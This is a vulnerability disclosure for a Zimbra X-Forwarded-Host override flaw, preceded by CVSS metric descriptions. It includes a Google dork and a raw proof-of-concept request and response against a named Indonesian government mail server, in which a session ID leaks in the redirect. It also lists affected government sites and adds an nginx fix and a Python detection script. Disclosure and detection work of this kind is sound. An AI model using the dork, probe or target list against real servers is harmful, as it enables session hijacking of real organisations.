Attack Vector (AV): Network
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).

Attack Complexity (AC): Low
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.

Privileges Required (PR): Low
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction (UI): None
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include a remote attacker who is able to send packets to a target system, or a locally authenticated attacker who executes code to elevate privileges.

Scope (S): Unchanged
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.

Confidentiality (C): Low
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.

Integrity (I): High
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.

Availability (A): High
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Zimbra - Request URL Override Vulnerability
#############################################################
# Exploit Title: Zimbra - Request URL Override Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung
# Google Dork: inurl:/public/launchSidebar.jsp
# Software Vendor: Zimbra
# Software Version: *
# Software Link: https://www.zimbra.com/downloads
# Date: 2022-05-09
#############################################################
[*] About:
----------
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client.
#############################################################
[*] Detail:
-----------
Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request.
Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries.
Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy enabling localised cache poisoning.
The application appears to support the use of a custom HTTP header to override the Host header.
The attacker added the following header to the request:
X-Forwarded-Host: cxsecurity.com
The value of this header was reflected in the response (in the Location header of the resulting 302 redirect), showing that the header was processed.
#############################################################
[*] Impact:
-----------
Because the redirect target is built from the attacker-supplied X-Forwarded-Host value, a user whose request carries that header is redirected to a site of the attacker's choosing, and the Location header of the response carries the session identifier as a ;jsessionid= path parameter (the same value that is set in the JSESSIONID cookie), so it is disclosed to that site; this allows account takeover via the session (see the value of the response header "location" in the PoC). In the captured exchange the session is a freshly created, unauthenticated one (loginErrorCode=service.AUTH_REQUIRED); the attack is most relevant where an intermediary such as a corporate proxy or cache forwards or injects the header for other users, since browsers do not send X-Forwarded-Host on their own.
#############################################################
[*] Remediation:
----------------
To fully resolve this issue, locate the component that processes the affected headers, and disable it entirely. If you are using a framework, applying any pending security updates may do this for you.
If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed.
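The workaround on the intermediate system, shown here for an nginx reverse proxy as an added illustration (this is not Zimbra's shipped proxy configuration, and the upstream address is assumed): setting the forwarding headers unconditionally from the proxy's own view of the request replaces whatever the client sent, so a client-supplied X-Forwarded-Host never reaches the application.

```nginx
# Added example: generic nginx reverse proxy in front of the webmail tier.
# The upstream address is an assumption; adjust it to the real backend.
location / {
    proxy_pass http://127.0.0.1:8080;

    # Always set the forwarding headers from the proxy's own values.
    # proxy_set_header overwrites any header of the same name that the
    # client supplied, so an injected X-Forwarded-Host is discarded.
    proxy_set_header Host              $host;
    proxy_set_header X-Forwarded-Host  $host;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
}
```

If the backend does not need the header at all, setting it to the empty string (proxy_set_header X-Forwarded-Host "";) removes it from the proxied request entirely.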
#############################################################
[*] PoC:
--------
# Request:
GET /public/launchSidebar.jsp HTTP/2
Host: mail.polri.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
X-Forwarded-Host: cxsecurity.com
Pragma: no-cache
Cache-Control: no-cache
TE: trailers
# Response:
HTTP/2 302 Found
server: nginx
date: Mon, 09 May 2022 04:48:53 GMT
content-type: text/html;charset=utf-8
content-length: 0
strict-transport-security: max-age=31536000
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-robots-tag: noindex
x-frame-options: SAMEORIGIN
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, max-age=0
pragma: no-cache
set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/
location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
X-Firefox-Spdy: h2
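A check for the behaviour shown in the PoC above, added here as an illustration and not part of the original advisory or of Zimbra's code. It builds the probe request with a tester-controlled canary host in X-Forwarded-Host, parses a raw HTTP response, and reports whether the Location header points at the canary and whether a ;jsessionid= path parameter is carried along with it. The canary host name, the target host name and the two sample responses are constructed for the example (modelled on the captured response above; the session identifier values are made up).

```python
"""Detect reflection of a client-supplied X-Forwarded-Host into a redirect.

Added example, not the advisory's or Zimbra's code. Host names and sample
responses below are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

CANARY = "canary.example"  # assumed tester-controlled host name


def build_probe(target_host: str, path: str, canary: str = CANARY) -> bytes:
    """Build the raw HTTP/1.1 request the PoC sends, with the override
    header set to a host the tester controls."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {target_host}",
        f"X-Forwarded-Host: {canary}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_response(raw: str):
    """Split a raw HTTP response into (status_code, headers).

    Header names are lower-cased so the check is case-insensitive."""
    head, _, _body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def check_reflection(raw_response: str, canary: str = CANARY) -> dict:
    """Report whether the redirect host equals the injected canary and
    whether a jsessionid path parameter rides along in the Location URL."""
    status, headers = parse_response(raw_response)
    location = headers.get("location", "")
    redirect_host = urlsplit(location).hostname or ""
    m = re.search(r";jsessionid=([^?;/]+)", location)
    return {
        "status": status,
        "redirect_host": redirect_host,
        "host_reflected": redirect_host.lower() == canary.lower(),
        "jsessionid_in_url": m.group(1) if m else None,
    }


# Constructed sample modelled on the advisory's captured response; the
# session identifier is made up.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "server: nginx\r\n"
    "content-length: 0\r\n"
    "set-cookie: JSESSIONID=node0abc123.node0;Path=/\r\n"
    "location: http://canary.example/;jsessionid=node0abc123.node0"
    "?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED\r\n"
    "\r\n"
)

# Constructed response from a server that ignores the override header.
SAFE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "server: nginx\r\n"
    "content-length: 0\r\n"
    "location: https://mail.example.org/?loginOp=relogin\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(build_probe("mail.example.org", "/public/launchSidebar.jsp").decode())
    print("vulnerable sample:", check_reflection(SAMPLE_RESPONSE))
    print("safe sample:     ", check_reflection(SAFE_RESPONSE))
```

Run against a live target by sending the bytes from build_probe over a TLS socket and feeding the raw reply to check_reflection; host_reflected being true on its own confirms the override is honoured, and a non-empty jsessionid_in_url confirms that the session identifier leaves with the redirect.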
#############################################################
[*] Affected:
--------------
https://mail.polri.go.id/public/launchSidebar.jsp
https://mail.kejaksaan.go.id/public/launchSidebar.jsp
And other vital Indonesian websites.